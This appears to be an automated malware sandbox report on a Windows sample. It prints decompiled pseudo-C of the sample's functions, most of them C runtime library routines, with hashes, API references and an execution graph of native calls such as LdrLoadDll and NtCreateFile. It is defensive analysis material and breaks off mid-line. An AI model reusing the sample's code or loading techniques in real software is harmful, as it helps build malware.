                                                                                              • Associated: 00000001.00000002.315321247.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_vfpbkeeo.jbxd
                                                                                              Similarity
                                                                                              • API ID: AdjustPointer
                                                                                              • String ID:
                                                                                              • API String ID: 1740715915-0
                                                                                              • Opcode ID: 7dbd8ae98522bf1432c834e9a4cc7e72d049eefd2febbb600f3223c1e1c5d9cd
                                                                                              • Instruction ID: 614e6de3fa1348f9a397c35c150ba1b9de5cb739e4c5f35eedd518035018bb18
                                                                                              • Opcode Fuzzy Hash: 7dbd8ae98522bf1432c834e9a4cc7e72d049eefd2febbb600f3223c1e1c5d9cd
                                                                                              • Instruction Fuzzy Hash: 9F51F671605206AFDB288F15D841BABBBA8EF49302F14453FE9016B2D1D739EE41CB98
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00408758 Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E00408758(intOrPtr* _a4, intOrPtr _a8, void* _a12, intOrPtr _a16) {
				intOrPtr _t17;
				intOrPtr _t18;
				intOrPtr _t20;
				intOrPtr _t30;
				char _t32;
				intOrPtr _t40;
				intOrPtr* _t42;
				intOrPtr _t43;

				_t42 = _a4;
				if(_t42 != 0) {
					_t32 = 0;
					__eflags =  *_t42;
					if( *_t42 != 0) {
						_t17 = E004099F0(_a16, 0, _t42, 0xffffffff, 0, 0, 0, 0);
						__eflags = _t17;
						if(_t17 != 0) {
							_t40 = _a8;
							__eflags = _t17 -  *((intOrPtr*)(_t40 + 0xc));
							if(__eflags <= 0) {
								L11:
								_t18 = E00408D13(_a16, _t42,  *((intOrPtr*)(_t40 + 8)),  *((intOrPtr*)(_t40 + 0xc)));
								__eflags = _t18;
								if(_t18 != 0) {
									 *((intOrPtr*)(_t40 + 0x10)) = _t18 - 1;
									_t20 = 0;
									__eflags = 0;
								} else {
									E00407AD0(GetLastError());
									_t20 =  *((intOrPtr*)(E00407B2A()));
								}
								L14:
								return _t20;
							}
							_t20 = E00408D90(_t40, __eflags, _t17);
							__eflags = _t20;
							if(_t20 != 0) {
								goto L14;
							}
							goto L11;
						}
						E00407AD0(GetLastError());
						return  *((intOrPtr*)(E00407B2A()));
					}
					_t43 = _a8;
					__eflags =  *((intOrPtr*)(_t43 + 0xc));
					if(__eflags != 0) {
						L6:
						 *((char*)( *((intOrPtr*)(_t43 + 8)))) = _t32;
						L2:
						 *((intOrPtr*)(_t43 + 0x10)) = _t32;
						return 0;
					}
					_t30 = E00408D90(_t43, __eflags, 1);
					__eflags = _t30;
					if(_t30 != 0) {
						return _t30;
					}
					goto L6;
				}
				_t43 = _a8;
				E00408D76(_t43);
				_t32 = 0;
				 *((intOrPtr*)(_t43 + 8)) = 0;
				 *((intOrPtr*)(_t43 + 0xc)) = 0;
				goto L2;
			}











                                                                                              0x0040875f
                                                                                              0x00408764
                                                                                              0x00408782
                                                                                              0x00408784
                                                                                              0x00408787
                                                                                              0x004087b0
                                                                                              0x004087b8
                                                                                              0x004087ba
                                                                                              0x004087d3
                                                                                              0x004087d6
                                                                                              0x004087d9
                                                                                              0x004087e7
                                                                                              0x004087f4
                                                                                              0x004087f9
                                                                                              0x004087fb
                                                                                              0x00408814
                                                                                              0x00408817
                                                                                              0x00408817
                                                                                              0x004087fd
                                                                                              0x00408804
                                                                                              0x0040880f
                                                                                              0x0040880f
                                                                                              0x00408819
                                                                                              0x00000000
                                                                                              0x00408819
                                                                                              0x004087de
                                                                                              0x004087e3
                                                                                              0x004087e5
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004087e5
                                                                                              0x004087c3
                                                                                              0x00000000
                                                                                              0x004087ce
                                                                                              0x00408789
                                                                                              0x0040878c
                                                                                              0x0040878f
                                                                                              0x0040879e
                                                                                              0x004087a1
                                                                                              0x00408778
                                                                                              0x00408778
                                                                                              0x00000000
                                                                                              0x0040877b
                                                                                              0x00408795
                                                                                              0x0040879a
                                                                                              0x0040879c
                                                                                              0x0040881d
                                                                                              0x0040881d
                                                                                              0x00000000
                                                                                              0x0040879c
                                                                                              0x00408766
                                                                                              0x0040876b
                                                                                              0x00408770
                                                                                              0x00408772
                                                                                              0x00408775
                                                                                              0x00000000

                                                                                              APIs
                                                                                                • Part of subcall function 004099F0: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0040DB6F,?,00000000,-00000008), ref: 00409A51
                                                                                              • GetLastError.KERNEL32 ref: 004087BC
                                                                                              • __dosmaperr.LIBCMT ref: 004087C3
                                                                                              • GetLastError.KERNEL32(?,?,?,?), ref: 004087FD
                                                                                              • __dosmaperr.LIBCMT ref: 00408804
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.315286538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.315268209.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.315303639.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.315321247.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_vfpbkeeo.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                              • String ID:
                                                                                              • API String ID: 1913693674-0
                                                                                              • Opcode ID: a64b2c4ff41b056d7e790c6088904a0390213258d3c7592535cf2e0185dc0622
                                                                                              • Instruction ID: c55cfb83998ae2281bc80398ba20696b5e79288bba8f8444085f6d671e65ba2d
                                                                                              • Opcode Fuzzy Hash: a64b2c4ff41b056d7e790c6088904a0390213258d3c7592535cf2e0185dc0622
                                                                                              • Instruction Fuzzy Hash: 73219F31600605ABDB10AF62DD8086BB7A8EF54368710C53EF995A36D1EF38EC018759
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00409A93 Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 17%
                                                                                              			E00409A93() {
				intOrPtr _v8;
				signed int _v12;
				WCHAR* _t5;
				void* _t6;
				intOrPtr _t9;
				WCHAR* _t19;
				WCHAR* _t26;
				WCHAR* _t29;

				_push(_t21);
				_t5 = GetEnvironmentStringsW();
				_t29 = _t5;
				if(_t29 != 0) {
					_t6 = E00409A5C(_t29);
					_t19 = 0;
					_v12 = _t6 - _t29 >> 1;
					_t9 = E004099F0(0, 0, _t29, _t6 - _t29 >> 1, 0, 0, 0, 0);
					_v8 = _t9;
					if(_t9 != 0) {
						_t26 = E0040A663(_t9);
						_push(0);
						if(_t26 != 0) {
							_push(0);
							_push(_v8);
							_push(_t26);
							_push(_v12);
							_push(_t29);
							_push(0);
							_push(0);
							if(E004099F0() != 0) {
								E00408654(0);
								_t19 = _t26;
							} else {
								E00408654(_t26);
							}
							FreeEnvironmentStringsW(_t29);
							_t5 = _t19;
						} else {
							E00408654();
							FreeEnvironmentStringsW(_t29);
							_t5 = 0;
						}
					} else {
						FreeEnvironmentStringsW(_t29);
						_t5 = 0;
					}
				}
				return _t5;
			}











                                                                                              0x00409a99
                                                                                              0x00409a9b
                                                                                              0x00409aa1
                                                                                              0x00409aa5
                                                                                              0x00409aad
                                                                                              0x00409ab2
                                                                                              0x00409ac0
                                                                                              0x00409ac3
                                                                                              0x00409acb
                                                                                              0x00409ad0
                                                                                              0x00409ae4
                                                                                              0x00409ae7
                                                                                              0x00409aea
                                                                                              0x00409afd
                                                                                              0x00409afe
                                                                                              0x00409b01
                                                                                              0x00409b02
                                                                                              0x00409b05
                                                                                              0x00409b06
                                                                                              0x00409b07
                                                                                              0x00409b12
                                                                                              0x00409b1d
                                                                                              0x00409b22
                                                                                              0x00409b14
                                                                                              0x00409b15
                                                                                              0x00409b15
                                                                                              0x00409b26
                                                                                              0x00409b2c
                                                                                              0x00409aec
                                                                                              0x00409aec
                                                                                              0x00409af3
                                                                                              0x00409af9
                                                                                              0x00409af9
                                                                                              0x00409ad2
                                                                                              0x00409ad3
                                                                                              0x00409ad9
                                                                                              0x00409ad9
                                                                                              0x00409b2f
                                                                                              0x00409b32

                                                                                              APIs
                                                                                              • GetEnvironmentStringsW.KERNEL32 ref: 00409A9B
                                                                                                • Part of subcall function 004099F0: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0040DB6F,?,00000000,-00000008), ref: 00409A51
                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00409AD3
                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00409AF3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.315286538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.315268209.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.315303639.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.315321247.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_vfpbkeeo.jbxd
                                                                                              Similarity
                                                                                              • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                              • String ID:
                                                                                              • API String ID: 158306478-0
                                                                                              • Opcode ID: 6f501273134e3ac6e32dc741a68b59a78b292b0ce8d06f6b3e77b16888d4eff8
                                                                                              • Instruction ID: d1129c7cf317b7164aa29a22df79ea8f45d552a9883959a3a2e80d94c1d37a2b
                                                                                              • Opcode Fuzzy Hash: 6f501273134e3ac6e32dc741a68b59a78b292b0ce8d06f6b3e77b16888d4eff8
                                                                                              • Instruction Fuzzy Hash: B311E1F1A012157EEA1567B26CC9CAF7E6CEE992AC710043AF502B1283EE78DD41817D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040F0D8 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E0040F0D8(void* _a4, long _a8, DWORD* _a12) {
				void* _t13;

				_t13 = WriteConsoleW( *0x4188a0, _a4, _a8, _a12, 0);
				if(_t13 == 0 && GetLastError() == 6) {
					E0040F0C1();
					E0040F083();
					_t13 = WriteConsoleW( *0x4188a0, _a4, _a8, _a12, _t13);
				}
				return _t13;
			}




                                                                                              0x0040f0f5
                                                                                              0x0040f0f9
                                                                                              0x0040f106
                                                                                              0x0040f10b
                                                                                              0x0040f126
                                                                                              0x0040f126
                                                                                              0x0040f12c

                                                                                              APIs
                                                                                              • WriteConsoleW.KERNEL32(00000000,00000000,00404ABF,00000000,00000000,?,0040E74E,00000000,00000001,?,?,?,0040CBB2,?,00000000,00000000), ref: 0040F0EF
                                                                                              • GetLastError.KERNEL32(?,0040E74E,00000000,00000001,?,?,?,0040CBB2,?,00000000,00000000,?,?,?,0040D18C,00000000), ref: 0040F0FB
                                                                                                • Part of subcall function 0040F0C1: CloseHandle.KERNEL32(FFFFFFFE,0040F10B,?,0040E74E,00000000,00000001,?,?,?,0040CBB2,?,00000000,00000000,?,?), ref: 0040F0D1
                                                                                              • ___initconout.LIBCMT ref: 0040F10B
                                                                                                • Part of subcall function 0040F083: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0040F0B2,0040E73B,?,?,0040CBB2,?,00000000,00000000,?), ref: 0040F096
                                                                                              • WriteConsoleW.KERNEL32(00000000,00000000,00404ABF,00000000,?,0040E74E,00000000,00000001,?,?,?,0040CBB2,?,00000000,00000000,?), ref: 0040F120
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.315286538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.315268209.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.315303639.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.315321247.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_vfpbkeeo.jbxd
                                                                                              Similarity
                                                                                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                              • String ID:
                                                                                              • API String ID: 2744216297-0
                                                                                              • Opcode ID: 6b0d60f89ce8668f2ac42161de5e1b1f0541704127e43477a4232957118a1954
                                                                                              • Instruction ID: fdd2b329f3811946b64428869fd4673360347ed8fc57e3c8cab5a41eb6fe68e0
                                                                                              • Opcode Fuzzy Hash: 6b0d60f89ce8668f2ac42161de5e1b1f0541704127e43477a4232957118a1954
                                                                                              • Instruction Fuzzy Hash: 45F0F836801154FBCF322FD5DC049CA3E66EB483A0B408036FA08A6571CA36C861ABA8
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004036A0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 64%
                                                                                              			E004036A0(void* __ecx, void* __edx, signed char* _a4, signed char* _a8, intOrPtr _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				signed int _v8;
				signed int _v12;
				intOrPtr* _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				signed int _v36;
				void* _v40;
				intOrPtr _v44;
				signed int _v48;
				intOrPtr _v56;
				void _v60;
				signed char* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t74;
				void* _t75;
				char _t76;
				signed char _t78;
				signed int _t80;
				signed char* _t81;
				signed int _t82;
				signed int _t83;
				intOrPtr* _t87;
				void* _t90;
				signed char* _t93;
				intOrPtr* _t96;
				signed char _t97;
				intOrPtr _t98;
				intOrPtr _t99;
				intOrPtr* _t101;
				signed int _t102;
				signed int _t103;
				signed char _t108;
				signed char* _t111;
				signed int _t112;
				void* _t113;
				signed char* _t116;
				void* _t121;
				signed int _t123;
				void* _t130;
				void* _t131;

				_t110 = __edx;
				_t100 = __ecx;
				_t96 = _a4;
				if( *_t96 == 0x80000003) {
					return _t74;
				} else {
					_push(_t121);
					_push(_t113);
					_t75 = E004023C3(_t96, __ecx, __edx, _t113, _t121);
					if( *((intOrPtr*)(_t75 + 8)) != 0) {
						__imp__EncodePointer(0);
						_t121 = _t75;
						if( *((intOrPtr*)(E004023C3(_t96, __ecx, __edx, 0, _t121) + 8)) != _t121 &&  *_t96 != 0xe0434f4d &&  *_t96 != 0xe0434352) {
							_t87 = E00402841(__edx, 0, _t121, _t96, _a8, _a12, _a16, _a20, _a28, _a32);
							_t130 = _t130 + 0x1c;
							if(_t87 != 0) {
								L16:
								return _t87;
							}
						}
					}
					_t76 = _a20;
					_v24 = _t76;
					_v20 = 0;
					if( *((intOrPtr*)(_t76 + 0xc)) > 0) {
						_push(_a28);
						E00402774(_t96, _t100, 0, _t121,  &_v40,  &_v24, _a24, _a16, _t76);
						_t112 = _v36;
						_t131 = _t130 + 0x18;
						_t87 = _v40;
						_v16 = _t87;
						_v8 = _t112;
						if(_t112 < _v28) {
							_t102 = _t112 * 0x14;
							_v12 = _t102;
							do {
								_t103 = 5;
								_t90 = memcpy( &_v60,  *((intOrPtr*)( *_t87 + 0x10)) + _t102, _t103 << 2);
								_t131 = _t131 + 0xc;
								if(_v60 <= _t90 && _t90 <= _v56) {
									_t93 = _v44 + 0xfffffff0 + (_v48 << 4);
									_t108 = _t93[4];
									if(_t108 == 0 ||  *((char*)(_t108 + 8)) == 0) {
										if(( *_t93 & 0x00000040) == 0) {
											_push(0);
											_push(1);
											E0040327B(_t112, _t96, _a8, _a12, _a16, _a20, _t93, 0,  &_v60, _a28, _a32);
											_t112 = _v8;
											_t131 = _t131 + 0x30;
										}
									}
								}
								_t112 = _t112 + 1;
								_t87 = _v16;
								_t102 = _v12 + 0x14;
								_v8 = _t112;
								_v12 = _t102;
							} while (_t112 < _v28);
						}
						goto L16;
					}
					E004061FE(_t96, _t100, _t110, 0, _t121);
					asm("int3");
					_t111 = _v68;
					_push(_t96);
					_push(_t121);
					_push(0);
					_t78 = _t111[4];
					if(_t78 == 0) {
						L41:
						_t80 = 1;
					} else {
						_t101 = _t78 + 8;
						if( *_t101 == 0) {
							goto L41;
						} else {
							_t116 = _a4;
							if(( *_t111 & 0x00000080) == 0 || ( *_t116 & 0x00000010) == 0) {
								_t97 = _t116[4];
								_t123 = 0;
								if(_t78 == _t97) {
									L33:
									if(( *_t116 & 0x00000002) == 0 || ( *_t111 & 0x00000008) != 0) {
										_t81 = _a8;
										if(( *_t81 & 0x00000001) == 0 || ( *_t111 & 0x00000001) != 0) {
											if(( *_t81 & 0x00000002) == 0 || ( *_t111 & 0x00000002) != 0) {
												_t123 = 1;
											}
										}
									}
									_t80 = _t123;
								} else {
									_t59 = _t97 + 8; // 0x6e
									_t82 = _t59;
									while(1) {
										_t98 =  *_t101;
										if(_t98 !=  *_t82) {
											break;
										}
										if(_t98 == 0) {
											L29:
											_t83 = _t123;
										} else {
											_t99 =  *((intOrPtr*)(_t101 + 1));
											if(_t99 !=  *((intOrPtr*)(_t82 + 1))) {
												break;
											} else {
												_t101 = _t101 + 2;
												_t82 = _t82 + 2;
												if(_t99 != 0) {
													continue;
												} else {
													goto L29;
												}
											}
										}
										L31:
										if(_t83 == 0) {
											goto L33;
										} else {
											_t80 = 0;
										}
										goto L42;
									}
									asm("sbb eax, eax");
									_t83 = _t82 | 0x00000001;
									goto L31;
								}
							} else {
								goto L41;
							}
						}
					}
					L42:
					return _t80;
				}
			}















































                                                                                              0x004036a0
                                                                                              0x004036a0
                                                                                              0x004036a7
                                                                                              0x004036b0
                                                                                              0x004037cf
                                                                                              0x004036b6
                                                                                              0x004036b6
                                                                                              0x004036b7
                                                                                              0x004036b8
                                                                                              0x004036c2
                                                                                              0x004036c5
                                                                                              0x004036cb
                                                                                              0x004036d5
                                                                                              0x004036fa
                                                                                              0x004036ff
                                                                                              0x00403704
                                                                                              0x004037cb
                                                                                              0x00000000
                                                                                              0x004037cc
                                                                                              0x00403704
                                                                                              0x004036d5
                                                                                              0x0040370a
                                                                                              0x0040370d
                                                                                              0x00403710
                                                                                              0x00403716
                                                                                              0x0040371c
                                                                                              0x0040372e
                                                                                              0x00403733
                                                                                              0x00403736
                                                                                              0x00403739
                                                                                              0x0040373c
                                                                                              0x0040373f
                                                                                              0x00403745
                                                                                              0x0040374b
                                                                                              0x0040374e
                                                                                              0x00403751
                                                                                              0x00403760
                                                                                              0x00403761
                                                                                              0x00403761
                                                                                              0x00403766
                                                                                              0x00403779
                                                                                              0x0040377b
                                                                                              0x00403780
                                                                                              0x0040378b
                                                                                              0x0040378d
                                                                                              0x0040378f
                                                                                              0x004037ab
                                                                                              0x004037b0
                                                                                              0x004037b3
                                                                                              0x004037b3
                                                                                              0x0040378b
                                                                                              0x00403780
                                                                                              0x004037b9
                                                                                              0x004037ba
                                                                                              0x004037bd
                                                                                              0x004037c0
                                                                                              0x004037c3
                                                                                              0x004037c6
                                                                                              0x00403751
                                                                                              0x00000000
                                                                                              0x00403745
                                                                                              0x004037d0
                                                                                              0x004037d5
                                                                                              0x004037d9
                                                                                              0x004037dc
                                                                                              0x004037dd
                                                                                              0x004037de
                                                                                              0x004037df
                                                                                              0x004037e4
                                                                                              0x0040385c
                                                                                              0x0040385e
                                                                                              0x004037e6
                                                                                              0x004037e6
                                                                                              0x004037ec
                                                                                              0x00000000
                                                                                              0x004037ee
                                                                                              0x004037f1
                                                                                              0x004037f4
                                                                                              0x004037fb
                                                                                              0x004037fe
                                                                                              0x00403802
                                                                                              0x00403834
                                                                                              0x00403837
                                                                                              0x0040383e
                                                                                              0x00403844
                                                                                              0x0040384e
                                                                                              0x00403857
                                                                                              0x00403857
                                                                                              0x0040384e
                                                                                              0x00403844
                                                                                              0x00403858
                                                                                              0x00403804
                                                                                              0x00403804
                                                                                              0x00403804
                                                                                              0x00403807
                                                                                              0x00403807
                                                                                              0x0040380b
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040380f
                                                                                              0x00403823
                                                                                              0x00403823
                                                                                              0x00403811
                                                                                              0x00403811
                                                                                              0x00403817
                                                                                              0x00000000
                                                                                              0x00403819
                                                                                              0x00403819
                                                                                              0x0040381c
                                                                                              0x00403821
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00403821
                                                                                              0x00403817
                                                                                              0x0040382c
                                                                                              0x0040382e
                                                                                              0x00000000
                                                                                              0x00403830
                                                                                              0x00403830
                                                                                              0x00403830
                                                                                              0x00000000
                                                                                              0x0040382e
                                                                                              0x00403827
                                                                                              0x00403829
                                                                                              0x00000000
                                                                                              0x00403829
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004037f4
                                                                                              0x004037ec
                                                                                              0x0040385f
                                                                                              0x00403863
                                                                                              0x00403863

                                                                                              APIs
                                                                                              • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 004036C5
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.315286538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.315268209.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.315303639.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.315321247.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_vfpbkeeo.jbxd
                                                                                              Similarity
                                                                                              • API ID: EncodePointer
                                                                                              • String ID: MOC$RCC
                                                                                              • API String ID: 2118026453-2084237596
                                                                                              • Opcode ID: 7515fac633b202046bfe47031adcc31d00906ea54cd49ac607522224187c6b20
                                                                                              • Instruction ID: 453235018314dcff3f3928b2ec1c2f4877cb67c60228a2120898c87eb78c671e
                                                                                              • Opcode Fuzzy Hash: 7515fac633b202046bfe47031adcc31d00906ea54cd49ac607522224187c6b20
                                                                                              • Instruction Fuzzy Hash: CB4159B1900209EFCF15DF94CD81AAEBFB9BF48305F1480AAFA05772A1D3399A50DB54
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Execution Graph

                                                                                              Execution Coverage:5%
                                                                                              Dynamic/Decrypted Code Coverage:2.5%
                                                                                              Signature Coverage:4.7%
                                                                                              Total number of Nodes:638
                                                                                              Total number of Limit Nodes:74
                                                                                              execution_graph 24971 4201b3 24974 41e873 24971->24974 24979 41f2c3 24974->24979 24976 41e88f 24983 9e9a00 LdrInitializeThunk 24976->24983 24977 41e8aa 24980 41f348 24979->24980 24982 41f2d2 24979->24982 24980->24976 24982->24980 24984 419663 24982->24984 24983->24977 24985 419671 24984->24985 24986 41967d 24984->24986 24985->24986 24989 419ae3 LdrLoadDll 24985->24989 24986->24980 24988 4197cf 24988->24980 24989->24988 24990 40b553 24991 40b578 24990->24991 24996 40cf93 24991->24996 24993 40b5ab 24995 40b5d0 24993->24995 25001 40eb53 24993->25001 24998 40cfb7 24996->24998 24997 40cfbe 24997->24993 24998->24997 24999 40cff3 LdrLoadDll 24998->24999 25000 40d00a 24998->25000 24999->25000 25000->24993 25002 40eb7f 25001->25002 25012 41e4d3 25002->25012 25005 40eb9f 25005->24995 25009 40ebda 25021 41e783 25009->25021 25011 40ebfd 25011->24995 25013 41f2c3 LdrLoadDll 25012->25013 25014 40eb98 25013->25014 25014->25005 25015 41e513 25014->25015 25016 41f2c3 LdrLoadDll 25015->25016 25017 41e52f 25016->25017 25024 9e9710 LdrInitializeThunk 25017->25024 25018 40ebc2 25018->25005 25020 41eb03 LdrLoadDll 25018->25020 25020->25009 25022 41f2c3 LdrLoadDll 25021->25022 25023 41e79f NtClose 25022->25023 25023->25011 25024->25018 25025 4016c7 25026 40166f 25025->25026 25026->25025 25029 4233e3 25026->25029 25032 41fcf3 25029->25032 25033 41fd19 25032->25033 25046 40bf23 25033->25046 25035 41fd25 25036 40180f 25035->25036 25055 410153 25035->25055 25038 41fd44 25039 41fd57 25038->25039 25067 410113 25038->25067 25042 41fd6c 25039->25042 25076 41e9a3 25039->25076 25072 403583 25042->25072 25044 41fd7b 25045 41e9a3 2 API calls 25044->25045 25045->25036 25047 40bf27 25046->25047 25079 40be73 25047->25079 25049 40bf30 25050 40bf37 25049->25050 25091 40be13 25049->25091 25050->25035 25056 41017f 25055->25056 25485 40d463 25056->25485 25058 410191 25489 410023 25058->25489 25061 4101c4 25064 4101d5 25061->25064 25066 41e783 2 API calls 25061->25066 25062 4101ac 25063 4101b7 25062->25063 25065 41e783 2 API calls 25062->25065 25063->25038 25064->25038 25065->25063 25066->25064 25068 419663 LdrLoadDll 25067->25068 25069 410132 25068->25069 25070 410139 25069->25070 25071 41013b GetUserGeoID 25069->25071 25070->25039 25071->25039 25073 4035da 25072->25073 25075 4035e7 25073->25075 25508 40ddf3 25073->25508 25075->25044 25077 41f2c3 LdrLoadDll 25076->25077 25078 41e9c2 ExitProcess 25077->25078 25078->25042 25080 40be86 25079->25080 25130 41cf23 LdrLoadDll 25079->25130 25110 41cde3 25080->25110 25083 40be99 25083->25049 25084 40be8f 25084->25083 25113 41f643 25084->25113 25086 40bed6 25086->25083 25124 40bcb3 25086->25124 25088 40bef6 25131 40b713 LdrLoadDll 25088->25131 25090 40bf08 25090->25049 25092 40be30 25091->25092 25093 41f933 LdrLoadDll 25091->25093 25467 41f933 25092->25467 25093->25092 25096 41f933 LdrLoadDll 25097 40be5d 25096->25097 25098 40ff13 25097->25098 25099 40ff2c 25098->25099 25471 40d2e3 25099->25471 25101 40ff3f 25102 41e4d3 LdrLoadDll 25101->25102 25103 40ff4e 25102->25103 25104 40bf48 25103->25104 25475 41eac3 25103->25475 25104->25035 25106 40ff65 25107 40ff90 25106->25107 25478 41e553 25106->25478 25109 41e783 2 API calls 25107->25109 25109->25104 25111 41cdf8 25110->25111 25132 41e8f3 LdrLoadDll 25110->25132 25111->25084 25114 41f65c 25113->25114 25133 419253 25114->25133 25116 41f674 25117 41f67d 25116->25117 25172 41f483 25116->25172 25117->25086 25119 41f691 25119->25117 25189 41e1f3 25119->25189 25121 41f6c5 25194 4201f3 25121->25194 25445 4094a3 25124->25445 25126 40bcd4 25126->25088 25127 40bccd 25127->25126 25458 409763 25127->25458 25130->25080 25131->25090 25132->25111 25134 419596 25133->25134 25135 419267 25133->25135 25134->25116 25135->25134 25197 41df43 25135->25197 25138 419398 25200 41e653 25138->25200 25139 41937b 25257 41e753 LdrLoadDll 25139->25257 25142 4193bf 25144 4201f3 2 API calls 25142->25144 25143 419385 25143->25116 25145 4193cb 25144->25145 25145->25143 25146 41955a 25145->25146 25147 419570 25145->25147 25152 419463 25145->25152 25148 41e783 2 API calls 25146->25148 25263 418f73 LdrLoadDll NtReadFile NtClose 25147->25263 25149 419561 25148->25149 25149->25116 25151 419583 25151->25116 25153 4194ca 25152->25153 25155 419472 25152->25155 25153->25146 25154 4194dd 25153->25154 25259 41e5d3 25154->25259 25157 419477 25155->25157 25158 41948b 25155->25158 25258 418e33 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 25157->25258 25161 419490 25158->25161 25162 4194a8 25158->25162 25203 418ed3 25161->25203 25162->25149 25215 418bf3 25162->25215 25164 419481 25164->25116 25166 41949e 25166->25116 25168 41953d 25170 41e783 2 API calls 25168->25170 25169 4194c0 25169->25116 25171 419549 25170->25171 25171->25116 25173 41f49e 25172->25173 25174 41f4b0 25173->25174 25281 420173 25173->25281 25174->25119 25176 41f4d0 25284 418853 25176->25284 25178 41f4f3 25178->25174 25179 418853 3 API calls 25178->25179 25180 41f515 25179->25180 25180->25174 25316 419bb3 25180->25316 25182 41f59d 25183 41f5ad 25182->25183 25411 41f243 LdrLoadDll 25182->25411 25327 41f0b3 25183->25327 25186 41f5db 25406 41e1b3 25186->25406 25188 41f605 25188->25119 25190 41f2c3 LdrLoadDll 25189->25190 25191 41e20f 25190->25191 25439 9e967a 25191->25439 25192 41e22a 25192->25121 25442 41e963 25194->25442 25196 41f6ef 25196->25086 25198 41f2c3 LdrLoadDll 25197->25198 25199 41934c 25198->25199 25199->25138 25199->25139 25199->25143 25201 41f2c3 LdrLoadDll 25200->25201 25202 41e66f NtCreateFile 25201->25202 25202->25142 25204 418eef 25203->25204 25205 41e5d3 LdrLoadDll 25204->25205 25206 418f10 25205->25206 25207 418f17 25206->25207 25208 418f2b 25206->25208 25210 41e783 2 API calls 25207->25210 25209 41e783 2 API calls 25208->25209 25211 418f34 25209->25211 25212 418f20 25210->25212 25264 420313 LdrLoadDll RtlAllocateHeap 25211->25264 25212->25166 25214 418f3f 25214->25166 25216 418c71 25215->25216 25217 418c3e 25215->25217 25219 418dbc 25216->25219 25223 418c8d 25216->25223 25218 41e5d3 LdrLoadDll 25217->25218 25220 418c59 25218->25220 25221 41e5d3 LdrLoadDll 25219->25221 25222 41e783 2 